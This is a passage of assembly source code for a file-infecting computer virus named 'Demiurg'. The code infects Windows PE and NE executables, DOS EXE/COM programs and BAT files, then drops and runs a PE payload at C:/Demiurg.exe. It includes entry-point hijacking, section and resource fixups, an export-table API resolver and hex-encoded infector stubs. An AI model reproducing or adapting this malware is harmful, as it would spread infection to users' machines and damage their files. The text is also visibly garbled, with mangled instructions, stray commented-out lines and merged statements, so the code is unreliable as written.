NO_PAGE_ROUNDUP_:
MOV [EBX 2], DX
MOV [EBX 4], AX
JMP Abort_Infection
; ----- IT IS A New EXE FILE -------------------------------------- ------------
NEW_EXE:
MOV EBX, [EAX 3CH]; EBX = New Header Offset
Add EBX, EAX; EBX = New Header in Memmap
CMP DWORD PTR [EBX], "EP"; PE FILE?
JE Infect_pe
CMP Word PTR [EBX], "En"; NE file?
JNE Abort_infection
; ----- Infect a ne EXE FILE --------------------------------------- ---------
Infect_ne:
MOV EDI, [EBP Offset FileName_OFS]
MOV ESI, EDI
Search_pure_filename:
CMP Byte Ptr [EDI], "/"
JNE NO_BACKSLASH
MOV ESI, EDI
NO_BACKSLASH:
CMP Byte Ptr [EDI], 0
JE FOUND_END_FILENAME
Inc EDI
JMP Search_pure_filename
FOUND_END_FILENAME:
Inc ESI
Lea Edi, [EBP OFFSET OUR_FILENAME]
CLD
Movsd
Movsd
Movsd
XCHG EBX, EAX
MOV CX, [EAX 32H]; cx = align shift
OR CX, CX; Align Shift Zero?
Jnz align_ok; if not, it's alright
MOV CX, 9; if So, Use Default (512 byt)
ALIGN_OK:
OR CH, CH; Alignment TOG?
JNZ Abort_infection; if So, Then Close
MOV [EBP Offset Shift_Value], Cl; Store Align Shift Value
MOV [EBP Offset Shift_Value2], Cl; Store Again Shift Value
MOV EBX, SIZE_NE_VIRUS_CODE; EBX = Virus Length
SHR EBX, CL
Inc EBX; EBX = Aligned Length
SHL EBX, CL
Movzx ESI, Word PTR [EAX 24H]; ESI = Resource Table In FileAdd ESI, ESI = Resource Table In Map
CMP CX, [ESI]; file align = resource align?
JNE Abort_infection; if not, then close
INC ESI; ESI = 1st TypeInfo
Inc ESI
MOV [EBP Offset Resource_Table], ESI; Save Start of Resource Table
Movzx EDX, Word PTR [EAX 16H]; Edx = Number of Code SECT.
Dec Edx; Count Starts with One ONE
SHL EDX, 3; 1 SECT. HEADER = 8 BYtes
Movzx ECX, Word PTR [EAX 22h]; ECX = Start of Segment Table
Add Edx, Ecx; EDX = Segment Header in File
Add Edx, Eax; Edx = Segment Header of Start
Code segment in mapped MEM
Movzx ECX, Word PTR [EDX 2]; ECX = Segment Size In File
OR ECX, ECX; 64k Segment?
JZ Abort_Infection; if So, Exit
CMP [EDX 6], CX; CMP with SIZE IN MEM
JNE ABORT_INFECTION; EXIT IF NOT Equal
Push Word PTR [EAX 14H]; Save Old Start IP
POP Word PTR [EBP Offset Ne_Start_IP]
MOV [EAX 14H], CX; SET New One
Add [EDX 2], BX; Fixup Physical Segment Size
Add [EDX 6], BX; Fixup Virtual Segment Size
Movzx EDI, Word PTR [EDX]; Start of Segment In File
Push ECX
MOV CL, [EBP OFFSET Shift_Value]
SHL EDI, CL; Start of Segment in Bytes
POP ECX
Add Edi, Ecx; Add Size of Segment
MOV ESI, [EBP Offset FileSize]
MOV ECX, ESI
Sub ECX, EDI; Length To Move
Dec ESI
Add ESI, [EBP OFFSET MAPBASE]
Push EDI; Save Virus Start
Add [EBP Offset FileSize], EBX; Fixup FileSize
Mov EDI, ESI
Add Edi, EBX
STD
REP MOVSB
POP EDI
Push EDI
Add Edi, [EBP Offset Mapase]
Lea ESI, [EBP OFFSET NE_VIRUS_CODE]
MOV ECX, EBX
CLD
REP MOVSB
POP EDX; EDX = Virus Start in File
MOV CL, [EBP OFFSET Shift_Value]
SHR EBX, Cl; EBX = Virus Size In Alignment UnitsMovzx ESI, Word PTR [EAX 22H]; Start of Segment Table
Add ESI, ESI ESI = Segment Table In Map
Movzx ECX, Word PTR [EAX 1CH]; ECX = Number of Segments
segment_loop_head:
Movzx Eax, Word PTR [ESI]; EAX = Offset of Resource
DB 0C1H, 0E0H; SHL EAX, IMM8
SHIFT_VALUE DB?
CMP EAX, EDX; Resource OFS> Virus Start?
Jl segment_ok
Add Word PTR [ESI], BX; FIX UP RESOURCE OFFSET
Segment_ok:
Add ESI, 8
Loop segment_loop_head
MOV ESI, [EBP OFFSET Resource_Table]
Resources_loop_head:
CMP Word PTR [ESI], 0; END OF TYPEINFO TABLE?
JE DONE_RESOURCES
Movzx ECX, Word PTR [ESI 2]; Resource Count
Lea EDI, [ESI 8]; NameInfo Array
NameInfo_loop_head:
Movzx Eax, Word PTR [EDI]; EAX = Offset of Resource
DB 0C1H, 0E0H; SHL EAX, IMM8
SHIFT_VALUE2 DB?
CMP EAX, EDX; Resource OFS> Virus Start?
JL resource_ok
Add Word PTR [EDI], BX; FIX UP RESOURCE OFFSET
Resource_ok:
Add EDI, 12
Loop nameinfo_loop_head
MOV ESI, EDI
JMP resources_loop_head
DONE_RESOURCES:
MOV EDI, [EBP Offset Mapase]
Add Edi, [EBP OFFSET FileSize]
Call Create_Dropper
Add DWORD PTR [EBP Offset FileSize], Dropper_size
JMP Abort_Infection
; ----- Infect a pee file --------------------------------------- ---------
Infect_pe:
Push Ebx; Save pehader Pointer
Call append_pe; modify last hand. for Virus
MOV EBX, [EBP OFFSET VIRUS_RVA]; EBX = RVA of Virus in Victim
XCHG EBX, [EAX 28H]; SET AS New Entrypoint, Save
; Old Entryrva in EBX
MOV ECX, [EAX 34H]; ECX = ImageBase
MOV [EBP OFFSET ImageBase], ECX; Save IT
Add EBX, ECX; EBX = Entry VA
MOV [EBP Orig_EIP], EBX; Save IT
POP EBX; EBX = Pe Header PointerCall Finish_pe_infection; append Virus, Recalc CRC
Already_INFECTED:
Abort_INFECTION:
Call Closemap; Close FileMap and File
Quit_infect_ERROR:
RET
; ----- End Infect File ----------------------------------------- ----------------
OpenFile:
MOV [EBP OFFSET FileName_OFS], EDX
Push Edx; Offset FileName
Call [EBP Offset getFileAttributesa]
MOV [EBP Attributes], EAX
INC EAX
Jnz get_attribs_ok
STC
RET
Get_attribs_ok:
Push 80h; Normal Attributes
Push DWORD PTR [EBP OFFSET FileName_OFS]
Call [EBP Offset SetFileAttributesa]
OR EAX, EAX
JNZ KILL_ATTRIBS_OK
STC
RET
Kill_attribs_ok:
Push 0; Template File (shit)
Push 80h; File Attributes (Normal)
Push 3; Open EXISTING
Push 0; Security Attributes (shit)
Push 0; Do Not Share File
PUSH 0C0000000H; Read / Write Mode
Push DWORD PTR [EBP OFFSET FileName_OFS]; Pointer to FileName
Call [EBP Offset CreateFilea]
MOV [EBP FILEHANDLE], EAX
Inc Eax; EAX = -1 (Invalid Handle Val)
JNZ Open_ok
STC
RET
Open_ok:
Lea Eax, [EBP Offset LastWrittime]
Push EAX
Sub Eax, 8
Push EAX
Sub Eax, 8
Push EAX
Push DWORD PTR [EBP OFFSET FILEHANDLE]
Call [EBP OFFSET GETFILETIME]
OR EAX, EAX
Jnz get_time_ok
Call Closefile
STC
RET
GET_TIME_OK:
Push 0; High FileSize DWORD PTR
Push DWORD PTR [EBP OFFSET FILEHANDLE]
Call [EBP OFFSET GETFILESIZE]
MOV [EBP OFFSET FileSize], EAX
INC EAX
Jnz get_filesize_ok
Call Closefile
STC
RET
Get_filesize_ok:
Add Eax, Workspace-1
JMP MapFile
Createfile:
MOV [EBP OFFSET FileName_OFS], EDX
Push 0; Template File (shit)
Push 80h; File Attributes (Normal)
Push 1; CREATE New File (Failure IF
ild one exists
Push 0; security attributes (shit) push 0; do not shared file
PUSH 0C0000000H; Read / Write Mode
Push Edx; Pointer to FileName
Call [EBP Offset CreateFilea]
MOV [EBP Offset FileHandle], EAX
Inc Eax; EAX = -1 (Invalid Handle Val)
JNZ CreateFile_ok
STC
RET
Createfile_ok:
MOV DWORD PTR [EBP Offset Attributes], 80H
Lea EDI, [EBP Offset CreationTime]
XOR EAX, EAX
MOV ECX, 6
Rep Stosw
MOV [EBP Offset FileSize], ECX; FileSize = 0
Mov Eax, Workspace
MapFile:
Push 0; Name file mapping obj (shit)
Push Eax; Low DWORD OF FILESize
Push 0; High DWORD OF FILESize
PUSH 4; Page_Readwrite
Push 0; Security Attributes (shit)
Push DWORD PTR [EBP OFFSET FILEHANDLE]
Call [EBP Offset CreateFilemappinga]
MOV [EBP Offset MapHandle], EAX
OR EAX, EAX; Close?
JNZ CreateFilemapping_ok
Call Closefile
STC
RET
CREATEFILEMAPPING_OK:
Push 0; map the whole file
Push 0; low dword of fileoffset
Push 0; high dword of fileoffset
Push 2; Read / Write Access
Push DWORD PTR [EBP Offset MapHandle]
Call [EBP Offset MapViewOffile]
MOV [EBP Offset MapAse], EAX
OR EAX, EAX
JNZ MapFile_ok
Call Closemaphandle
STC
RET
MapFile_ok:
Push EAX
Xchg EDI, EAX
Add Edi, [EBP OFFSET FileSize]
XOR EAX, EAX
MOV ECX, Workspace
Rep Stosb
POP EAX
CLC
RET
Closemap:
Push DWORD PTR [EBP OFFSET MAPBASE]
Call [EBP Offset UnmapViewOffile]
Closemaphandle:
Push DWORD PTR [EBP Offset MapHandle]
Call [EBP Offset CloseHandle]
Push 0; Move Relative to Start Of File
Push 0; High Word Pointer Of File Offset
Push DWORD PTR [EBP OFFSET FileSize]
Push DWORD PTR [EBP OFFSET FILEHANDLE]
Call [EBP Offset SetFilePointer]
Push DWORD PTR [EBP OFFSET FILEHANDLE CALL [EBP OFFSET SETENDOFFILE]
Closefile:
Lea Eax, [EBP Offset LastWrittime]
Push EAX
Sub Eax, 8
Push EAX
Sub Eax, 8
Push EAX
Push DWORD PTR [EBP OFFSET FILEHANDLE]
Call [EBP Offset SetFileTime]
Push DWORD PTR [EBP OFFSET FILEHANDLE]
Call [EBP Offset CloseHandle]
Push DWORD PTR [EBP OFFSET Attributes]]
Push DWORD PTR [EBP OFFSET FileName_OFS]
Call [EBP Offset SetFileAttributesa]
RET
; ----- Modify PE File Last Section / Imagesize for Infection -----------------
APPEND_PE:
Movzx ECX, Word PTR [EBX 6]; ECX = Number of Sections
Dec ECX; ECX = Number of last section
Push Ebx; Save pehader offset
Movzx EDX, Word PTR [EBX 14H]; EDX = Size OFTIONAL HEADER
Add EBX, EDX; Add Size OFTIONAL HEADER
Add Size of File HEADER
EBX = First Section Header
XOR EDX, EDX; EDX = 0
Mov Eax, 40; EAX = Size of One SECT.HEADER
Mul ECX; EAX = Size of N-1 SECT.HEADERS
Add ebx, EBX; EBX = Last SECT.HEADER POINTER
POP Eax; Eax = pehader Pointer
OR DWORD PTR [EBX 24H], 0E0000020H; Modify Last Section Flags:
Read, Write, EXEC, CODE
MOV ECX, [EBX 8H]; ECX = Virtualsize of Last SECT
OR ECX, ECX; Virtualsize = 0?
JNZ Virtualsize_ok; if not, IT's OK
MOV ECX, [EBX 10h]; if Yes, IT Means That
Virtualsize = SizeOfrawData
Virtualsize_ok:
MOV EDX, ECX; EDX = Last SECT .VIRTUALSIZE
Add Edx, [EBX 14H]; Add PointertorawData
Add Edx, [EBP MAPBASE]; Add Start of Memmap
MOV [EBP OFFSET VIRUS_START], EDX; Save Start of Virus In Map
Mov Edx, Ecx; EDX = Virtualsize
Add EDX, [EBX 0CH]; Add VirtualAddress
MOV [EBP Offset Virus_rva], EDX; Save Virus RvaAdd ECX, Virus_Size; ECX = New Section Size
Push Ecx; Save IT
MOV [EBX 8H], ECX; Set IT As New Virtualsize
MOV EDX, [EAX 3CH]; EDX = filealign
Call align_ecx; align physical sect. size
MOV [EBX 10h], ECX; Save IT As New SizeOfrawData
Add ECX, [EBX 14H]; Add PointertorawData
MOV [EBP FileSize], ECX; Save IT As New File Size
POP ECX; ECX = New Section Size
Add ECX, [EBX 0CH]; ECX = New ImageSize
MOV EDX, [EAX 38H]; EDX = Sectionalign
Call align_ecx; Align THE New ImageSize
MOV [EAX 50H], ECX; SET IT AS New Image Size
RET
; ----- Move Virus Body and Recalculate Checksum ------------------------------------------------------------------------------------------------------------------------------------------------------------
FINISH_PE_INFECTION:
Lea ESI, [EBP START]; ESI = Start of Virus Body
MOV EDI, [EBP VIRUS_START]; EDI = Virus Place in Victim
MOV ECX, Virus_Size; ECX = Size of Virus
Rep Movsb; Copy VirusBody To Filemap
Add EBX, 58H; EBX = PE CHECKSUM IN MAP
Cmp DWORD PTR [EBX], 0; Checksummed File?
JE END_FINISH_PE_INFECTION; if NOT, WE Are DONE
Lea Eax, [EBP OFFSET ImageHLP_DLL]; EAX = Ptr To "ImageHLP.dll"
Push EAX
Call [EBP Offset LoadLibrarya]; loading imagehlp.dll
OR EAX, Eax; Eax = 0 means we failed
JZ end_finish_pe_infection
Push Ebx; Save Pointer to Old CRC
Lea ESI, [EBP Offset ChecksummappedFile]; Get The checksummappedfile
Call my_getprocaddress; API
POP EBX; Restore Pointer to Old CRC
JC END_FINISH_PE_INFECTION
MOV ECX, [EDX EAX]; ECX = API RVA
Add Eax, ECX; ECX = API VA
Push EBX; Old CRC Pointer
Lea EBX, [EBP DUMMY_DWORD]
Push Ebx; Place to Store Old CRC
Push DWORD PTR [EBP FileSize]; SIZE OF FILE
Push DWORD PTR [EBP MAPBASE]; MapBaseCall Eax; Call ChecksumMappedFile
END_FINISH_PE_INFECTION:
RET
; ----- Getapis ------------------------------------------------------------------------------------------------------- ------------------
EAX = Module Base Address
ECX = NUMBER OF API API API
ESI = Pointer to Names Table
EDI = Pointer to Addresses Table
Getapis:
GET_APIS_LOOP:
Push Ecx; Save Number of Apis
Push Eax; Save Module Base Address
Push EDI; Save Pointer to Address TBL
Call MY_GETPROCADDRESS; GET RVA OF RVA of One API
POP EDI; EDI = Where To Store The RVAS
MOV ECX, [EDX EAX]; ECX = API RVA
Add Eax, ECX; EAX = API VA
Store the API VA
Next_API_LOOP:
INC ESI; Go to Next Byte
CMP BYTE PTR [ESI], 0; Reached End Of API Name?
JNE NEXT_API_LOOP; if Not, Search ON
INC ESI; ESI = Next API Name
POP Eax; Eax = Module Base Address
POP ECX; ECX = Number of Apis LEFT
LOOP GET_APIS_LOOP; Get The Next API
RET
; ----- MY_GETPROCADDRESS ----------------------------------------------------------------------- ------------
Input:
EAX = Module Base Address
ESI = API Function Name
Output:
; EDX = RVA of RVA of API Function
MY_GETPROCADDRESS:
MOV EBX, EAX; EBX = Module Base Address
Add Ebx, [EAX 3CH]; EBX = New EXE Header
MOV EBX, [EBX 78H]; EBX = Export Directory RVA
Add EBX, EX; EBX = Export Directory VA
XOR ECX, ECX; ECX = 0 (Counter)
MOV EDX, [EBX 18H]; EDX = NumberOfnames
MOV EDI, [EBX 20H]; EDI = AddressOfnames Array RVA
Add Edi, EAX; EDI = AddressofNames Array VA
Search_loop:
Pusha; Save All Registers
MOV EDI, [EDI ECX * 4]; EDI = RVA of current API Name
Add Edi, EAX; EDI = VA of current API Name
CMP_LOOP:
Lodsb; Get a byte from ot api name
CMP BYTE PTR [EDI], AL; IS BYTE Equal? JNE Search_on_api; if not, this isn't Our API
Inc EDI; Compare Next Byte
OR Al, Al; Reached End of API Name?
JNE CMP_LOOP; if Not, Go ON with Compare
JMP Found_API; if Yes, We Found Our API!
Search_on_api:
POPA; Restore All Registers
Inc ECX; Try The Next Exported API
CMP ECX, EDX; END OF EXPORTED APIS?
Jl search_loop; if Yes, Try the next one
API_NOT_FOND:
POPA; Restore All Regisers
Stc; Indicate Error with Carry
RET
Found_api:
POPA; Restore All Registers
MOV EDX, [EBX 24h]; EDX = Addressofordinals RVA
Add Edx, Eax; EDX = Addressofordinals VA
Movzx ECX, Word PTR [EDX ECX * 2]; ECX = Our Api's Ordinal
MOV EDX, [EBX 1CH]; EDX = Addressoffunctions RVA
Lea EDX, [EDX ECX * 4]; EDX = RVA of RVA OF API
CLC; Successful, Clear Carry
RET
; ----- Aligns ECX to EDX ------------------------------------------------------------------------------------- -----------
ALIGN_ECX:
Push EBX; Save EBX
XCHG EAX, ECX; EAX = Value To BE Aligned
MOV EBX, EDX; EBX = Alignment Factor
XOR EDX, EDX; ZERO OUT High DWORD
Div ebx; Divide
OR EDX, EDX; Remainer Zero?
JZ NO_ROUND_UP; if So, Don't Round Up
Inc Eax; Round Up
NO_ROUND_UP:
Mul Ebx; Multiply Again
Xchg Eax, ECX; ECX = Aligned Value
Mov Edx, EBX; EDX = Alignment Factor
POP EBX; Restore EBX
RET
; ----- Decompress --------------------------------------------------------------------------------------- ---------------
ESI: Source Buffer Offset
; EDI: Destination BUFFER OFFSET
EBX: SIZE COMPRESSED DATA
Decompress:
Add EBX, ESI; EBX = Pointer TO END OF
Compressed Data
CLD; CLD; Clear Direction Flag
Loop_head:
Lodsb; Get a byte from compR. data
CMP Al, '?; Is IT Our Special Byte?
JNE Store; if not, Just Treat It Normalxor Eax, Eax; EAX = 0
Lodsb; EAX = Number of Repetitions
XCHG EAX, ECX; ECX = Number of Repetitions
Lodsb; Al = byte to store reptainly
Rep Stosb; Store the byte reptainively
JMP GO_ON; Go ON with the next byte
Store:
Stosb; Simply Store the Byte
Go_on:
CMP EBX, ESI; Reached the end?
Ja loop_head; if not, Just Decompress ON
RET
; ----- Creates the pe dropper -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------
Input:
EDI-WHERE TO PUT THE DROPPER
CREATE_DROPPER:
Pusha; Save All Registers
MOV DWORD PTR [EBP Orig_EIP], 401060H; Set Entryrva for Dummy PE
MOV DWORD PTR [EBP ImageBase], 400000H; Set ImageBase for Dummy PE
MOV EBX, Dummy_PE_SIZE; EBX = Size of Dummy PE File
Lea ESI, [EBP OFFSET DUMMY_PE]; ESI = Pointer to Compressed
PE File Dropper
Call Decompress; Decompress IT
Lea ESI, [EBP START]; ESI = Start of Virus Body
MOV ECX, Virus_Size; ECX = Size of Virus Body
CLD; CLD; Clear Direction Flag
Rep Movsb; COPY Virus Body
POPA; Restore All Registers
RET
; ----- Compressed New Header for Com-> EXE Conversion -----------------------
NEW_MZ_HEADER:
DB 04DH, 05AH, 0E6H, 006H, 000H, 002H, 000H, 001H
DB 000H, 0FFH, 0FFH, 0F0H, 0FFH, 0FEH, 0FFH, 000H
DB 000H, 000H, 001H, 0F0H, 0FFH, 0E6H, 008H, 000H
NEW_MZ_HEADER_SIZE EQU ($ - new_MZ_HEADER)
; ----- Code That Will Be Added to Dos EXE / COM FILES ------------------------
;
; .286
; .Model Tiny
; .code
ORG 100H
Start:
Pusha; Save All Registers
; push ds; save segment registers
; Push ES
;
Call Next; Get Delta Offset
Next:
POP BP
Sub bp, Offset Next
;
; MOV AX, DS; AX = PSP Segment
; decAx; ax = mcb segment
; MOV DS, AX; DS = MCB Segment; MOV BX, DS: [3]; BX = MCB Size (in Paragraphs)
Sub bx, 0e00h; shrink mcb for 0e00h bytes
;
; MOV AH, 4AH; Resize MCB in Es to BX Paragraphs
; int 21h; We need to free ram if we want to
; EXECUTE ANOTHER Program, Even IF
IT is for windows
;
; Push CS; DS = CS
POP DS
;
; MOV AX, ES; AX = ES = PSP Segment
; MOV [BP Offset Segm], AX; Save In Data Block
;
; push cs; es = CS
POP ES
;
; MOV AH, 3CH; CREATE FILE
; XOR CX, CX; CX = 0 (AttribTes for new file)
Lea DX, [BP Offset FileName]; DS: DX = Pointer to FileName
; INT 21h
;
XCHG BX, AX; Handle to BX
;
; MOV AH, 40H; WRITE TO FILE
; MOV CX, Dropper_Size; Write the Whole Dropper
Lea DX, [BP Offset Dropper]; DS: DX = Pointer to Write Buffer
; INT 21h
;
; MOV AH, 3EH; Close File
; INT 21h
;
EXECUTE:
; MOV AX, 4B00H; Execute File
Lea BX, [BP Offset Parameter]; ES: BX = Pointer To Parameter Block
Lea DX, [BP Offset FileName]; DS: DX = Pointer to FileName
; INT 21h
;
POP ES; Restore Segment Registers
POP DS
;
; MOV AX, ES; AX = PSP Segment
Add Ax, 10h; AX = Start Segment of Program Image
Add [BP RELO_CS], AX; Relocate Old Segment Values
Add [BP RELO_SS], AX
;
; POPA; Restore All Registers
;
; db 68h; push imm16
; RELO_SS DW?
;
; CLI
POP SS; SET HOST SS
DB 0BCH; MOV SP, IMM16
SP_START DW?
STI
;
DB 0EAH; JMP FAR IMM32
IP_START DW?
; RELO_CS DW?
;
;
Filename DB "C: /Demiurg.exe", 0
;
Parameter:
; dw 0; Same Enviroment As Caller
DW 80h
; SEGM DW 0
DW 4 DUP (0FFFFH); FCB Addresses (Nothing)
;
Dropper:
;
; End Start
DOS_VIRUS_CODE:
DB 060H, 01EH, 006H, 0E8H, 000H, 000H, 05DH, 081HDB 0EDH, 006H, 001H, 08CH, 0D8H, 048H, 08EH, 0D8H
DB 08BH, 01EH, 003H, 000H, 081H, 0EBH, 000H, 00EH
DB 0B4H, 04AH, 0CDH, 021H, 00Eh, 01FH, 08CH, 0C0H
DB 089H, 086H, 07EH, 001H, 00Eh, 007H, 0B4H, 03CH
DB 033H, 0C9H, 08DH, 096H, 06BH, 001H, 0CDH, 021H
DB 093H, 0B4H, 040H, 0B9H
DW Dropper_size
DB 08DH, 096H
DB 088H, 001H, 0CDH, 021H, 0B4H, 03EH, 0CDH, 021H
DB 0B8H, 000H, 04BH, 08DH, 09EH, 07AH, 001H, 08DH
DB 096H, 06BH, 001H, 0CDH, 021H, 007H, 01FH, 08CH
DB 0C0H, 005H, 010H, 000H, 001H, 086H, 069H, 001H
DB 001H, 086H, 05EH, 001H, 061H, 068H
RELO_SS DW?
DB 0FAH, 017H, 0BCH
SP_START DW?
DB 0fbh, 0eah
IP_START DW?
RELO_CS DW?
DB 043H, 03AH, 05CH, 044H, 045H
DB 04DH, 049H, 055H, 052H, 047H, 02EH, 045H, 058H
DB 045H, 000H, 000H, 000H, 080H, 000H, 000H, 000H
DB 0FFH, 0FFH, 0FFH, 0FFH, 0FFH, 0FFH, 0FFH, 0FFH
SIZE_DOS_VIRUS_CODE EQU ($ - DOS_VIRUS_CODE)
; ----- Code That Will Be Added to Bat Files --------------------------------------------------------------------------------------------------------------------------------------
;
This is the ba code this is appended at the end of infected bat files. As
You see, IT Echoes Out A COM File and Executes It. Then The Com File Reads
The pe dropper this is stored as a Kind of International Overlay At the end of inload
The Bat File, Writes It to Disk and Executes It. Here Is The ASM Source OF
The CoM loader first:
;
; .286
; .Model Tiny
; .code
ORG 100H
Start:
; MOV AH, 4ah; Resize Memory Block
; MOV BX, 2020H; BX = New MCB SIZE IN Paragraphs
; INT 21h
;
; xor bx, bx; bx = 0
; MOV BL, 80H; BX = 80H (Command Line In PSP)
; MOV Si, BX; Si = BX
; MOV BL, [Si]; bx = Length of CommandLine
; MOV [Si BX 1], BH; Make Command Line Zero Terminated
;
; MOV AX, 3D02H; Open file read / write; Lea DX, [Si 2]; DS: DX = Pointer to FileName (cmdline)
; INT 21h
JNC File_ok
Re; Quit COM file
;
FILE_OK:
XCHG BX, AX; Handle to BX
;
; MOV AX, 4202H; Set Filepointer Relative to Eof
; xor cx, cx; cx = 0
; DEC CX; CX = -1
; MOV DX, ((-Dropper_size) -1); OtherWise We 10 Have A Zerobyte
;; in the com file
; Inc DX; CX: DX = -Dropper_size
; INT 21h
;
; MOV AH, 3FH; Read from File
; MOV CX, Dropper_size - 1; Read The Whole PE DROPPER
; Inc CX
; MOV DX, OFFSET BUFFER; DS: DX = Offset to Read buffer
; INT 21h
;
; MOV AH, Not 3Eh; Close File
NOT AX
; INT 21h
;
; MOV AH, Not 3ch; Create File
NOT AX
; xor cx, cx; cx = 0 (file attributes)
; MOV ZERO, CL; Make FileName Zero Terminated
; MOV DX, Offset EXEFILE; DS: DX = Pointer to FileName
; INT 21h
JC quit
;
XCHG BX, AX; Handle to BX
;
; MOV AH, 40H; WRITE TO FILE
; MOV CX, Dropper_size - 1; CX = Size to Write (WHOLE PE DRPPER)
; Inc CX
; MOV DX, OFFSET BUFFER; DS: DX = Pointer to Write Buffer
; INT 21h
JC quit
;
; MOV AH, Not 3Eh; Close File
NOT AX
; INT 21h
;
; xor ax, ax; AX = 0
; MOV AH, 4BH; AX = 4B00H
; xor bx, bx; bx = 0 (no parameter block)
; MOV DX, Offset EXEFILE; DS: DX = Pointer to FileName
; INT 21h
;
Quit:
; MOV AH, 4CH; Quit Program
; INT 21h
;
EXEFILE DB "C: /Demiurg.exe"
Zero DB?
; buffer:
;
; End Start
BAT_VIRUS_CODE:
DB "@echo off", 0DH, 0AH
DB "set overlay =% 0", 0DH, 0AH
DB "if not exist% overlay% set overlay =% 0.bat", 0DH, 0AH
DB "echo"
DB 0B4H, 04AH, 0BBH, 020H, 020H, 0CDH, 021H, 033H
DB 0DBH, 0B3H, 080H, 08BH, 0F3H, 08AH, 01CH, 088HDB 078H, 001H, 0B8H, 002H, 03DH, 08DH, 054H, 002H
DB 0CDH, 021H, 073H, 001H, 0C3H, 093H, 0B8H, 002H
DB 042H, 033H, 0C9H, 049H, 0BAH
DW ((-Dropper_size) - 1)
DB 042H, 0CDH, 021H, 0B4H, 03FH, 0B9H
DW (Dropper_size - 1)
DB 041H
DB 0BAH, 07EH, 001H, 0CDH, 021H, 0B4H, 0C1H, 0F7H
DB 0D0H, 0CDH, 021H, 0B4H, 0C3H, 0F7H, 0D0H, 033H
DB 0C9H, 088H, 00Eh, 07DH, 001H, 0BAH, 06FH, 001H
DB 0CDH, 021H, 072H, 01FH, 093H, 0B4H, 040H, 0B9H
DW (Dropper_size - 1)
DB 041H, 0BAH, 07EH, 001H, 0CDH, 021H, 072H, 011H
DB 0B4H, 0C1H, 0F7H, 0D0H, 0CDH, 021H, 033H, 0C0H
DB 0B4H, 04BH, 033H, 0DBH, 0BAH, 06FH, 001H, 0CDH
DB 021H, 0B4H, 04CH, 0CDH, 021H, 043H, 03AH, 05CH
DB 064H, 065H, 06DH, 069H, 075H, 072H, 067H, 02EH
DB 065H, 078H, 065H
DB "> C: /Demiurg.exe"
DB 0DH, 0AH
DB "C: /Demiurg.exe% overlay%", 0DH, 0AH
DB "set overlay =", 0DH, 0AH
DB 1AH; End of Text File
Size_bat_virus_code EQU ($ - bat_virus_code)
; ------ Code That Will Be Added to Ne Files --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
;
; .286
; .Model Tiny
; .code
ORG 100H
Start:
Pusha; Save All Registers
; push ds; save segment registers
; Push ES
;
Call Next; Get Delta Offset
Next:
POP Si
Add Si, (Data_Block - Next)
;
; MOV AX, ES; AX = PSP Segment
;
; Push CS; DS = CS
POP DS
;
; push ss; es = SS
POP ES
; CLD; CLD; Clear Direction Flag
; MOV CX, DATA_SIZE; CX = Size of Our Data
; SUB SP, (Data_SIZE 512); Allocate Buffer on Stack
; MOV BP, SP; BP = Stack Frame
; MOV DI, BP; DI = OUR BUFFER ON Stack
; Rep Movsb; Copy Data Block to StackBUF
;
; push ss; ds = es = ss
; Push SS
POP ES
POP DS
;
MOV [BP 4], AX; SET PSP Segm in paramblock
; MOV AX, 3D02H; Open File Read / Write
Lea DX, [BP OUR_FILENAME-DATA_BLOCK]; DS: DX = filename of ¥ Host
; INT 21h
JC EXIT
;
XCHG BX, AX; Handle to BX
;
; MOV AX, 4202H; Set FilePointer Relative
; to the end of the file
; MOV CX, -1; CX: DX = -Dropper_size
; MOV DX, -Dropper_size
; INT 21h
;
MOV [BP Source_Handle-Data_Block], BX; Save FileHandle
;
; MOV AH, 3CH; CREATE FILE
; xor cx, cx; cx = 0 (file attributes)
; Lea DX, [BP (filename-data_block]; DS: DX = Pointer to PE DROPPER
FileName ("C: /Demiurg.exe")
; INT 21h
JC Close_Source
;
MOV [BP DEST_HANDLE-DATA_BLOCK], AX; Save FileHandle
;
; MOV CX, (Dropper_Size / 512); CX = Size Of Dropper IN
512 Byte Blocks
;
RW_LOOP:
; push cx; save number of blocks left
;
; MOV AH, 3FH; Read from File
; MOV BX, [BP SOURCE_HANDLE-DATA_BLOCK]; BX = Source Handle
; MOV CX, 512; CX = Size to Read
Lea DX, [BP (Buffer-Data_Block]; DS: DX = Pointer to Read BUF
; INT 21h
;
; MOV AH, 40H; WRITE TO FILE
; MOV BX, [BP DEST_HANDLE-DATA_BLOCK]; bx = destination handle
; MOV CX, 512; CX = Size to WRITE
Lea DX, [BP (Buffer-Data_Block]; DS: DX = Pointer to Write BUF
; INT 21h
;
; POP CX; CX = Number of Blocks LEFT
Loop rw_loop
;
; MOV AH, 3EH; Close Source File
MOV BX, [BP SOURCE_HANDLE-DATA_BLOCK]
; INT 21h
;
MOV AH, 3EH; Close Destination File
; MOV BX, [BP DEST_HANDLE-DATA_BLOCK]
; INT 21h
;
; MOV AX, 4B00H; Execute Dropper file
; MOV BX, BP; ES: BX = Parameter Block
Lea DX, [BX 18]; DS: DX = filename
; INT 21h
;
JMP EXIT
;
Close_source:
; MOV AH, 3EH; Close File; MOV BX, [BP SOURCE_HANDLE-DATA_BLOCK]
; INT 21h
;
EXIT:
Add SP, (Data_Size 512); Remove Stack Buffer
;
POP ES; Restore Segment Registers
POP DS
; POPA; Restore All Registers
;
; db 68h; push imm16
Ne_ip DW 0
DB 0C3H; RET NEAR
;
Data_block dw 0; Same Enviroment As Caller
DW 80H; parameter string offset
; SEGM DW 0
DW 4 DUP (0)
;
Source_Handle DW 0
; dest_handle dw 0
Filename DB "C: /Demiurg.exe", 0
oor_filename db 13 dup (0)
Data_size = $ - DATA_BLOCK
; buffer:
;
; End Start
NE_VIRUS_CODE:
DB 060H, 01EH, 006H, 0E8H, 000H, 000H, 05EH, 081H
DB 0C6H, 094H, 000H, 08CH, 0C0H, 00Eh, 01FH, 016H
DB 007H, 0FCH, 0B9H, 02EH, 000H, 081H, 0ECH, 02EH
DB 002H, 08BH, 0ECH, 08BH, 0FDH, 0F3H, 0A4H, 016H
DB 016H, 007H, 01FH, 089H, 046H, 004H, 0B8H, 002H
DB 03DH, 08DH, 056H, 021H, 0CDH, 021H, 072H, 05FH
DB 093H, 0B8H, 002H, 042H, 0B9H, 0FFH, 0FFH, 0BAH
DW -DROPPER_SIZE
DB 0CDH, 021H, 089H, 05EH, 00Eh, 0B4H
